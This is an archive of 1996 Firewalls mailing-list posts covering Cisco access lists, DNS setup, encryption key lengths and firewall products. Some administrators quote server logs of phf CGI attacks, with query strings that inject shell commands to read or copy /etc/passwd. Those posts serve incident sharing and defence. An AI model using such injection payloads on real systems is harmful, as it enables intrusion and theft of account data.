[17/Jun/1996:00:38:24 +0000] "GET /cgi-bin/p= > hf?Jserver=3Dns.uiuc.edu%0Agrep%20ftp%20/etc/passwd%0A&Qalias=3D&Qname=3D= > foo&Qemail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_= > school=3D&Qslip=3D HTTP/1.0" 200 138 > kuddp45.zilker.net unknown - [17/Jun/1996:00:40:21 +0000] "GET /cgi-bin/p= > hf?Jserver=3Dns.uiuc.edu%0Acp%20/etc/passwd%20%7Eftp/incoming%0A&Qalias=3D= > &Qname=3Dfoo&Qemail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D= > &Qhigh_school=3D&Qslip=3D HTTP/1.0" 200 119 > kuddp45.zilker.net unknown - [17/Jun/1996:00:40:46 +0000] "GET /cgi-bin/p= > hf?Jserver=3Dns.uiuc.edu%0Aid%0A&Qalias=3D&Qname=3Dfoo&Qemail=3D&Qnicknam= > e=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_school=3D&Qslip=3D HTT= > P/1.0" 200 116 > kuddp45.zilker.net unknown - [17/Jun/1996:00:41:22 +0000] "GET /cgi-bin/p= > hf?Jserver=3Dns.uiuc.edu%0Als%0A&Qalias=3D&Qname=3Dfoo&Qemail=3D&Qnicknam= > e=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_school=3D&Qslip=3D HTT= > P/1.0" 200 300 > kuddp45.zilker.net unknown - [17/Jun/1996:00:42:49 +0000] "GET /cgi-bin/p= > hf?Jserver=3Dns.uiuc.edu%0Aecho%0A&Qalias=3D&Qname=3Dfoo&Qemail=3D&Qnickn= > ame=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_school=3D&Qslip=3D H= > TTP/1.0" 200 95 > kuddp45.zilker.net unknown - [17/Jun/1996:00:43:18 +0000] "GET /cgi-bin/p= > hf?Jserver=3Dns.uiuc.edu%0Als%20%7Eftp/incoming%0A&Qalias=3D&Qname=3Dfoo&= > Qemail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_scho= > ol=3D&Qslip=3D HTTP/1.0" 200 107 > hugh.ndl.net unknown - [30/Jun/1996:00:31:31 +0000] "GET /cgi-bin/phf?Jse= > rver=3Dns.uiuc.edu%0Aid%0A&Qalias=3D&Qname=3Dfoo&Qemail=3D&Qnickname=3D&Q= > office_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_school=3D&Qslip=3D HTTP/1.0"= > 200 116 > [Mon Jun 17 00:35:24 1996] HTTPd: send aborted for annex059.ridgecrest.ca= > .us, URL: /cgi-bin/phf > > Hmmm... obviously the same person on zilker.net and ridgecrest.ca.us > grrrr... > > K=E6r kve=F0ja, > Gunni From firewalls-owner Thu Jul 11 05:50:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA06280 for firewalls-outgoing; Thu, 11 Jul 1996 05:38:40 -0700 (PDT) Received: from choreo.ca (mail.choreo.ca [198.73.137.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA06269 for ; Thu, 11 Jul 1996 05:38:30 -0700 (PDT) Received: by nic.choreo.ca id <20482>; Thu, 11 Jul 1996 08:46:38 -0400 In-Reply-To: <199607102032.NAA21108@miles.greatcircle.com> References: Conversation <199607102032.NAA21108@miles.greatcircle.com> with last message <199607102032.NAA21108@miles.greatcircle.com> To: Firewalls@GreatCircle.COM Reply-To: jenw@choreo.ca Mime-Version: 1.0 From: Jen Woods Subject: Re: Firewalls-Digest V5 #412 Date: Thu, 11 Jul 1996 08:35:57 -0400 Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: quoted-printable Message-Id: <96Jul11.084638edt.20482@nic.choreo.ca> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To whom it may concern, Please remove my name from your distribution list for the Firewalls-Digest. Thank You, Jennifer Woods *************************************************************************= *************************************************************** Jennifer Woods Sales Associate Choreo Systems Inc. Place de Ville - Tower B 112 Kent Street, Suite 1300 Ottawa, ON K1P 5P2 Telephone: (613) 238-1050 Toll Free: (800) 565-8649 Fax: (613) 238-4453 Internet: jenw@choreo.ca www.choreo.ca From firewalls-owner Thu Jul 11 06:10:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA07016 for firewalls-outgoing; Thu, 11 Jul 1996 05:48:57 -0700 (PDT) Received: from gatekeeper2.mcimail.com (gatekeeper2.mcimail.com [192.147.45.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA07007 for ; Thu, 11 Jul 1996 05:48:51 -0700 (PDT) Received: from mailgate2.mcimail.com (mailgate2.mcimail.com [166.40.135.23]) by gatekeeper2.mcimail.com (8.6.12/8.6.10) with SMTP id MAA29175; Thu, 11 Jul 1996 12:49:50 GMT Received: from mcimail.com by mailgate2.mcimail.com id ab16074; Date: Thu, 11 Jul 96 07:43 EST From: Karl Janice To: firewalls Subject: Re: Newbie Cisco Access-List Question Message-Id: <82960711124328/0006731076PK5EM@MCIMAIL.COM> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk MHS: Source date is: 11-Jul-96 08:32 EST Yes, the order matters. First come first serve. You would get all ports qt 1023 EXCEPT 2049. ______________________________ Reply Separator _________________________________ Subject: Newbie Cisco Access-List Question Author: jshaw (John M. Shaw) { NAME: John M. Shaw | EMS: INTERNET | MBX: jshaw@dttus.com } at MCIMAIL Date: 7/10/96 9:00 AM Assuming 2 lines with same source, s-mask, dest, and d-mask: access-list 101 permit tcp source s-mask dest d-mask gt 1023 access-list 101 deny tcp source s-mask dest d-mask eq 2049 Which one takes precedence? Does the order matter? Any help would be greatly appreciated? From firewalls-owner Thu Jul 11 06:21:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA09486 for firewalls-outgoing; Thu, 11 Jul 1996 06:12:56 -0700 (PDT) Received: from isgate.is (isgate.is [193.4.58.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA09425 for ; Thu, 11 Jul 1996 06:12:33 -0700 (PDT) Received: from linda.if.is by isgate.is (8.7.5-M/ISnet/14-10-91); Thu, 11 Jul 1996 13:09:56 GMT Received: by linda.if.is (Secure/IFnet/26-04-96); Thu, 11 Jul 1996 13:09:54 GMT From: gunni@if.is (Gunnar Ingvi Thorisson) Message-Id: <199607111309.NAA10529@linda.if.is> Subject: Re: Dirty dogs To: hhantman@eo.ray.com (Howard Hantman) Date: Thu, 11 Jul 1996 13:09:53 +0000 (GMT) Cc: dcarney@hypersurf.com, james@mail.state.mo.us, firewalls@GreatCircle.COM In-Reply-To: <9607111219.AA25794@eo.ray.com> from "Howard Hantman" at Jul 11, 96 08:19:12 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > now that you've published your vulnerability to the world, I hope you're > disabling the script! Is that a question? Did that before I posted to that list, however, I tried out that scripts and it looks like he was not able to read my shadowed password file but only the /etc/passwd since the http daemon runs under suid www. > Howard Hantman > Manager, Technology Integration > Corporate ITS > Raytheon Company Best regards.. ========================================================================= Gunnar Ingvi Þórisson E-Mail address: gunni@if.is Kerfisstjóri og forritari, system administrator and programmer Íslensk forritaþróun hf. (Iceland Software Inc.) Suðurlandsbraut 4, IS-108 Reykjavík, Ísland Sími: (+354) 588-1511 Fax: (+354) 588-8728 ========================================================================= From firewalls-owner Thu Jul 11 06:28:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA06141 for firewalls-outgoing; Thu, 11 Jul 1996 05:36:52 -0700 (PDT) Received: from mog.ucd.ie (mog.ucd.ie [193.1.143.84]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA06133 for ; Thu, 11 Jul 1996 05:36:43 -0700 (PDT) Message-Id: <199607111236.FAA06133@miles.greatcircle.com> Received: from mog.ucd.ie by mog.ucd.ie id <18982-0@mog.ucd.ie>; To: simon@webfactory.ie Subject: Re: DNS leakage Cc: firewalls-digest@greatcircle.com Date: Thu, 11 Jul 1996 13:31:57 +0100 From: Louis Twomey Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Simon, > The named.boot file on the internal server should also contain a "slave" line - > so that the internal server does not attempt to contact any other DNS servers, > regardless of how slow the external server (1.2.3.4) may be. Agreed. I mistakenly omitted this line. > The external server's resolv.conf should have a xfernets directive so that only > trusted external hosts can do a zone transfer. I am not convinced that this is necessary. Once a legitimate secondary has performed a zone transfer of one of your zones, then unless the secondary also applies an xfrnets directive in its named.boot file, your zone may be transferred from that nameserver by anyone. Being able to do a zone transfer directly from the external/firewall nameserver is often useful in trying to track down problems (errors in the zone file etc.). If anyone knows of a good reason to use the xfrnets option, then I would appreciate hearing it. > I don't think that there is any point in having the internal act as a secondary > to the external server. The internal server should have DNS entries > for all the machines on the network - and the external one should have just > those entries for machines that have direct (ie non-proxied) access to the > internet. > Hence there is no need for the internal server to act as a secondary for the > external server - so the internal data would not be overwritten by the > (superfluous) secondary data. The one benefit in the configuration that I suggested is that for any addition to the external nameserver zone file, you do not have to make the same addition to the internal nameserver file in order for internal hosts to "see" the entry (the intrenal secondary copy of the data gets updated automatically at the next scheduled zone transfer), thus maintenance of the system is easier. It is certainly an unusual configuration in DNS terms, but it works with bind-4.9.3-B9 (although not with bind-4.9.3-REL). How do others handle this - keep both the internal and external zone files syncronised manually ? Regards, Louis. From firewalls-owner Thu Jul 11 07:04:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA13346 for firewalls-outgoing; Thu, 11 Jul 1996 06:46:13 -0700 (PDT) Received: from sys3.cambridge.uk.psi.net (sys3.cambridge.uk.psi.net [154.32.106.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA13319 for ; Thu, 11 Jul 1996 06:46:00 -0700 (PDT) Received: from i-co.co.uk by sys3.cambridge.uk.psi.net (8.7.5/SMI-5.5-UKPSINet) Received: from xi.i-co.co.uk by i-co.co.uk (5.x/SMI-SVR4) Received: from adamis.co.uk by xi.i-co.co.uk (SMI-8.6/SMI-SVR4) Received: by adamis.co.uk (SMI-8.6/SMI-SVR4) Date: Thu, 11 Jul 1996 14:42:21 +0100 From: steve@i-co.co.uk (Steve England) Message-Id: <199607111342.OAA02855@adamis.co.uk> To: firewalls@greatcircle.com Subject: CISCO network level encryption & key lengths X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Reading CISCO's online technology briefs for the forthcoming (is there a firm release date ?) IOS 11.2 which includes network level encryption services (DES encryption) (http://www.cisco.com/warp/public/732/Security/ncryp_tc.htm) functionally it's exactly what we need to setup various distinct user groups - however, according to Diffie, Blaze, Rivest et al (http://www.bsa.org/policy/encryption/cryptographers.html) the exportable key length (40 bits) is far too small, even the domestic length (according to them) (56 bits) doesn't cut it. Question is, can anyone tell me if there is any chance of this key length being extended to around 75+ bits ? will the US State Dept. relax its restrictions as not to hinder US commerce ? If the answer to the above are all "no" then does anyone have any alternative product suggestions - that fall in line with the network level encryption CISCO are producing ? Regards Steve From firewalls-owner Thu Jul 11 07:24:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA16075 for firewalls-outgoing; Thu, 11 Jul 1996 07:12:02 -0700 (PDT) Received: from relay4.smtp.psi.net (relay4.smtp.psi.net [38.9.52.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA16063 for ; Thu, 11 Jul 1996 07:11:56 -0700 (PDT) Received: from uu6.psi.com by relay4.smtp.psi.net (8.7.5/SMI-5.4-PSI) Received: from larry.dcbnet.com by uu6.psi.com (5.65b/4.0.071791-PSI/PSINet) via SMTP; Received: from jmccain.dcbnet.com (mccain [205.166.54.68]) by larry.dcbnet.com (8.6.12/8.6.12) with SMTP id JAA17072 for ; Thu, 11 Jul 1996 09:10:16 -0500 Message-Id: <199607111410.JAA17072@larry.dcbnet.com> X-Sender: jmccain@dcbnet.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jul 1996 09:16:22 -0500 To: Firewalls@GreatCircle.COM From: jmccain@dcbnet.com (John McCain) Subject: Re: Dirty Dogs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I got one just this week! Maybe we should share the source addresses? wil-de1-06.ix.netcom.com - - [07/Jul/1996:22:47:32 -0500] "GET /cgi-bin/phf?QALIAS=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 403 - Cheers, John From firewalls-owner Thu Jul 11 07:27:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14109 for firewalls-outgoing; Thu, 11 Jul 1996 06:51:34 -0700 (PDT) Received: from gatekeeper.qualix.com (gatekeeper.qualix.com [192.91.182.105]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA14068 for ; Thu, 11 Jul 1996 06:51:22 -0700 (PDT) Received: from qualix.qualix by gatekeeper.qualix.com (8.6.9/Q940531.1) Received: from qualix20.qualix by qualix.qualix (4.1/SMI-4.1-Q931113.1) Received: from spirit.qualix by qualix20.qualix (SMI-8.6/SMI-SVR4) Received: by spirit.qualix (5.x/SMI-SVR4) From: security@qualix.com (Nik I. Knoth) Message-Id: <9607111345.AA22954@spirit.qualix> Subject: Re: firewall-1: Host Properties Problem To: murchiso@vivid.newbridge.com (Roderick Murchison, Jr.) Date: Thu, 11 Jul 1996 06:45:06 -0700 (PDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Roderick Murchison, Jr." at Jul 10, 96 05:54:37 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Try, with firewall running, re-clicking the SNMP fetch and let it find the IFs. -nik -- /\/ik I. / > > Hey everybody... > > There is probably something really stupid that I am missing here, but in > the "Host Properties" window, how do you delete an interface? I'm > running version 2.0e and was messing around with a few added interfaces > and different subnet masks... now I can't delete them. If I wipe them > out and try to save, it just gives me a warning about a blank entry and > retains the old settings. > > Thanks for any info... > -r > > Roderick Murchison, Jr. murchiso@newbridge.com > Newbridge Networks, Inc. office: (703) 708-5930 > Product Manager - VIVID ACS fax: (703) 708-5937 > Herndon, VA 22070-5241 http://www.vivid.newbridge.com > > > From firewalls-owner Thu Jul 11 07:41:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17244 for firewalls-outgoing; Thu, 11 Jul 1996 07:29:03 -0700 (PDT) Received: from cet.cet.com (cet.cet.com [204.227.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA17208 for ; Thu, 11 Jul 1996 07:28:49 -0700 (PDT) Received: from cet.cet.com (roberth@cet.cet.com [204.227.191.1]) by cet.cet.com (8.6.12/8.6.12) with SMTP id HAA30267; Thu, 11 Jul 1996 07:25:53 -0700 Date: Thu, 11 Jul 1996 07:25:52 -0700 (PDT) From: Robert Hanson To: Gunnar Ingvi Thorisson cc: Howard Hantman , dcarney@hypersurf.com Subject: Re: Dirty dogs In-Reply-To: <199607111309.NAA10529@linda.if.is> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ok, logic... didnt get the passwords, but i got the beef on the users... now i can shoot at the people... or human engineering... etc etc etc... ---> Robert H. Hanson LAN/WAN Consultant - Internet Service Provider Otis Orchards, Wa. Cutting Edge Communications www.cet.com (509) 927-9541 finger: info@cet.com or email: roberth@cet.com On Thu, 11 Jul 1996, Gunnar Ingvi Thorisson wrote: > > now that you've published your vulnerability to the world, I hope you'r= e > > disabling the script! >=20 > Is that a question? Did that before I posted to that list, however, I=20 > tried out that scripts and it looks like he was not able to read my=20 > shadowed password file but only the /etc/passwd since the http daemon=20 > runs under suid www. >=20 > > Howard Hantman > > Manager, Technology Integration > > Corporate ITS > > Raytheon Company >=20 > Best regards.. >=20 >=20 > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > Gunnar Ingvi =DE=F3risson E-Mail address: gunni@if= =2Eis > Kerfisstj=F3ri og forritari, system administrator and programmer >=20 > =CDslensk forrita=FEr=F3un hf. (Iceland Software Inc.) > Su=F0urlandsbraut 4, IS-108 Reykjav=EDk, =CDsland > S=EDmi: (+354) 588-1511 Fax: (+354) 588-8728 > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D >=20 From firewalls-owner Thu Jul 11 08:20:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA20973 for firewalls-outgoing; Thu, 11 Jul 1996 08:06:20 -0700 (PDT) Received: from perigee.com (mail.perigee.com [204.147.95.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA20965 for ; Thu, 11 Jul 1996 08:06:13 -0700 (PDT) Received: from smtp.dcc.com ([204.147.93.69]) by gateway.perigee.com with SMTP id <26513>; Thu, 11 Jul 1996 10:08:19 -0500 Received: by smtp.dcc.com with Microsoft Mail From: "Moubray, Steve" To: "'firewalls@greatcircle.com'" Subject: PIX Question Date: Thu, 11 Jul 1996 12:02:00 -0500 Message-ID: <31E533EB@smtp.dcc.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Perhaps I'm missing something (it wouldn't be the first time) but I'm having a discussion with a colleague about PIX. After reading the white papers, talking to a local Cisco rep and a few users of PIX, it seems to be a router with some advanced features. My colleague insists that it does not route packets, works at the application layer and is very different then similar products that do NAT. I understand the concept of stateful filtering and I can accept that in some cases it does work at the application layer but is it establishing new connections and does it always function at the application layer? Maybe Cisco could comment on the technical aspects but I'd like to hear from others on the security and use aspects. (To Cisco, how does it handle UDP?) I guess I could always get a PIX in here and test it but that would take more time then I have for the next few weeks and I'm trying to get a free lunch before then (from the colleague of course). If anyone helps with good information with out starting a flame war, I'll even split the lunch with you. You'll have to figure out the logistics though. Then again maybe I'll have to buy the lunch (that might be a first). TIA ~ Steve ---------------------------------------- Steve Moubray smoubray@perigee.com Perigee Communications Inc "Networking and Beyond" From firewalls-owner Thu Jul 11 09:20:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA25078 for firewalls-outgoing; Thu, 11 Jul 1996 08:49:03 -0700 (PDT) Received: from phobos.frii.com (phobos.frii.com [204.144.241.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA25047 for ; Thu, 11 Jul 1996 08:48:54 -0700 (PDT) Received: from rogermay (isdn119.pageplus.com [206.168.18.119]) by phobos.frii.com (8.6.12/8.6.9) with SMTP id JAA29045 for ; Thu, 11 Jul 1996 09:45:25 -0600 Message-ID: <31E52191.4803@frii.com> Date: Thu, 11 Jul 1996 09:45:21 -0600 From: "Roger A. May" Reply-To: rogermay@frii.com Organization: R & R Enterprises X-Mailer: Mozilla 3.0b5Gold (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Dirty Dogs References: <199607111410.JAA17072@larry.dcbnet.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am not sure as of yet, but I would say that someone has come up with a program that they have passed out to there 'buddies' and that is why so many source domains have been reported in the logs. Any ideas as to where one would look to see what is the 'lastest and greatest' hacker program? Possibly to get a copy or its source to fight against it. Roger A. May John McCain wrote: > > I got one just this week! Maybe we should share the source addresses? > > wil-de1-06.ix.netcom.com - - [07/Jul/1996:22:47:32 -0500] "GET > /cgi-bin/phf?QALIAS=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 403 - From firewalls-owner Thu Jul 11 09:20:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA25575 for firewalls-outgoing; Thu, 11 Jul 1996 08:54:05 -0700 (PDT) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA25566 for ; Thu, 11 Jul 1996 08:53:58 -0700 (PDT) Received: by relay.ashton.csc.com; id LAA08383; Thu, 11 Jul 1996 11:53:39 -0400 Received: from ckostick.sed.csc.com(20.2.53.154) by relay.ashton.csc.com via smap (g3.0.1) Received: by ckostick.sed.csc.com with Microsoft Mail Message-ID: <01BB6F1F.52A2F060@ckostick.sed.csc.com> From: Chris Kostick To: "firewalls@GreatCircle.COM" Subject: RE: CISCO network level encryption & key lengths Date: Thu, 11 Jul 1996 11:51:37 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve England[SMTP:steve@i-co.co.uk] wrote: > > > Reading CISCO's online technology briefs for the forthcoming (is there a > firm release date ?) IOS 11.2 which includes network level encryption services > (DES encryption) (http://www.cisco.com/warp/public/732/Security/ncryp_tc.htm) > functionally it's exactly what we need to setup various distinct user groups > - however, according to Diffie, Blaze, Rivest et al > (http://www.bsa.org/policy/encryption/cryptographers.html) > the exportable key length (40 bits) is far too small, even the domestic > length (according to them) (56 bits) doesn't cut it. This one has always bothered me a little - '40 bits is way too small.' There are 1,099,511,627,776 possible combinations of a key. Given today's technology it is crackable using brute force methods. But, who is going to do that? A person or persons have to have *a lot* of CPU power to crack it in a reasonalble amount time unless they get really really lucky. A government can do it fairly fast I imagine. Larger corporations like IBM , Microsoft, DEC, Citicorp, DOW, Exxon, etc............. can probably supply the horsepower needed. Are these people your adversaries? If not, then your risk is not as great as people like Diffie, Blaze and Rivest make it out to be. > > Question is, can anyone tell me if there is any chance of this key length > being extended to around 75+ bits ? will the US State Dept. relax its > restrictions as not to hinder US commerce ? I don't think anyone should touch that question with a ten foot pole. It seems to make sense, the US government is budging on the issue. Go figure. Anyway, anyone who 'claims' to know the answer is full of crap. Everyone knows it is something that has to (i.e. should) happen, but no one knows when. > > If the answer to the above are all "no" then does anyone have any alternative > product suggestions - that fall in line with the network level encryption > CISCO are producing ? Rumor alert! I once heard there are Japanese companies selling library implementations of DES, 3-DES, etc. A company such as Cisco could conceivably start an offshore company, obtain the outside encryption s/w (why rewrite it), and sell their new router to non-US customers. Some interoperability testing might be a problem (on the encryption side) with the US product, but it should work. Note, I'm not endorsing this, just making a comment. End rumor alert. -- chris From firewalls-owner Thu Jul 11 09:34:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA26586 for firewalls-outgoing; Thu, 11 Jul 1996 09:06:14 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA26574 for ; Thu, 11 Jul 1996 09:06:03 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607111603.AA21167@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: "Moubray Steve" Cc: "'firewalls@greatcircle.com'" From: Ryan.Russell/SYBASE Date: 11 Jul 96 9:04:46 EDT Subject: Re: PIX Question X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It depends on what you call a router... It does forward packets (after doing it's thing) based on layer 3 info, which is what I call a router. Plus, in practical terms, you set it as a "gateway" on your routers or hosts. Ryan ---------- Previous Message ---------- To: firewalls cc: From: SMOUBRAY @ DCC.COM ("Moubray, Steve") @ smtp Date: 07/11/96 12:02:00 PM Subject: PIX Question Perhaps I'm missing something (it wouldn't be the first time) but I'm having a discussion with a colleague about PIX. After reading the white papers, talking to a local Cisco rep and a few users of PIX, it seems to be a router with some advanced features. My colleague insists that it does not route packets, works at the application layer and is very different then similar products that do NAT. I understand the concept of stateful filtering and I can accept that in some cases it does work at the application layer but is it establishing new connections and does it always function at the application layer? Maybe Cisco could comment on the technical aspects but I'd like to hear from others on the security and use aspects. (To Cisco, how does it handle UDP?) I guess I could always get a PIX in here and test it but that would take more time then I have for the next few weeks and I'm trying to get a free lunch before then (from the colleague of course). If anyone helps with good information with out starting a flame war, I'll even split the lunch with you. You'll have to figure out the logistics though. Then again maybe I'll have to buy the lunch (that might be a first). TIA ~ Steve ---------------------------------------- Steve Moubray smoubray@perigee.com Perigee Communications Inc "Networking and Beyond" From firewalls-owner Thu Jul 11 09:51:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA27194 for firewalls-outgoing; Thu, 11 Jul 1996 09:13:45 -0700 (PDT) Received: from grumpy.mossbaygroup.com (mossbgrp.mossbaygrp.com [206.213.65.153]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA27178 for ; Thu, 11 Jul 1996 09:13:34 -0700 (PDT) Received: from [206.213.85.33] by grumpy.mossbaygroup.com (NTMail 3.01.03) id aa000078; Thu, 11 Jul 1996 09:08:01 -0700 Received: by JFlahiff.mossbaygroup.com with Microsoft Mail Message-ID: <01BB6F08.6FE32800@JFlahiff.mossbaygroup.com> From: "Joseph M. Flahiff" To: "'Firewalls Listserv'" Subject: Freeware Date: Thu, 11 Jul 1996 09:07:41 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Info: Evaluation version at grumpy.mossbaygroup.com X-Info: Moss Bay Group, Inc. Advisors In Technology Management Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous? TIA Joseph Flahiff Moss Bay Group, Inc. Advisors in Technology Management From firewalls-owner Thu Jul 11 09:51:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA26752 for firewalls-outgoing; Thu, 11 Jul 1996 09:08:54 -0700 (PDT) Received: from earth.usa.net (earth.usa.net [192.156.196.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA26743 for ; Thu, 11 Jul 1996 09:08:47 -0700 (PDT) Received: (from mec@localhost) by earth.usa.net (8.7.5/8.7.5) id KAA07245; Thu, 11 Jul 1996 10:05:45 -0600 (MDT) Date: Thu, 11 Jul 1996 10:05:43 -0600 (MDT) From: "Matthew Cable/USA.NET Inc." X-Sender: mec@earth To: Jean-Francois Zwobada cc: Stefan Berg , firewalls@GreatCircle.com Subject: Re: News-proxy for TIS fwtk? In-Reply-To: <31E38F8E.7766@apogee-com.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jul 1996, Jean-Francois Zwobada wrote: > Just use the plug-gw as this > > plug-gw: port nntp InternalNewsServer -plug-to ExternalNewsServer -port > nntp > plug-gw: port nntp ExternalNewsServer -plug-to InternalNewsServer -port > nntp > keep in mind, this setup will only allow you to have one incoming feed, as all feeds will appear to come from the proxy machine, no matter what host they are coming from on the outside. #!/usr/bin/perl -- Matthew Cable -- USA.NET -- Senior System Administrator $fof='8a*)v2*^Gf#*5S="!jh!;F)]#T):)#&f5kR^(%!E#;0>#:|#8)#;P#80#:o#;)#; From firewalls-owner Thu Jul 11 10:09:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA00217 for firewalls-outgoing; Thu, 11 Jul 1996 09:49:18 -0700 (PDT) Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA00206 for ; Thu, 11 Jul 1996 09:49:11 -0700 (PDT) Received: (from nobody@localhost) by tera.bctel.net (8.7.4/8.7.1) id JAA01667; Thu, 11 Jul 1996 09:40:12 -0700 (PDT) Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) Received: (from murrell@localhost) by mocha.bctel.net (8.7.5/8.7.3) id JAA16682; Thu, 11 Jul 1996 09:45:50 -0700 (PDT) From: Brian Murrell Message-Id: <199607111645.JAA16682@mocha.bctel.net> Date: Thu, 11 Jul 1996 09:45:48 -0700 (PDT) To: hhantman@eo.ray.com Cc: dcarney@hypersurf.com, james@mail.state.mo.us, firewalls@GreatCircle.COM Subject: Re[2]: Dirty dogs In-Reply-To: <9607111219.AA25794@eo.ray.com> 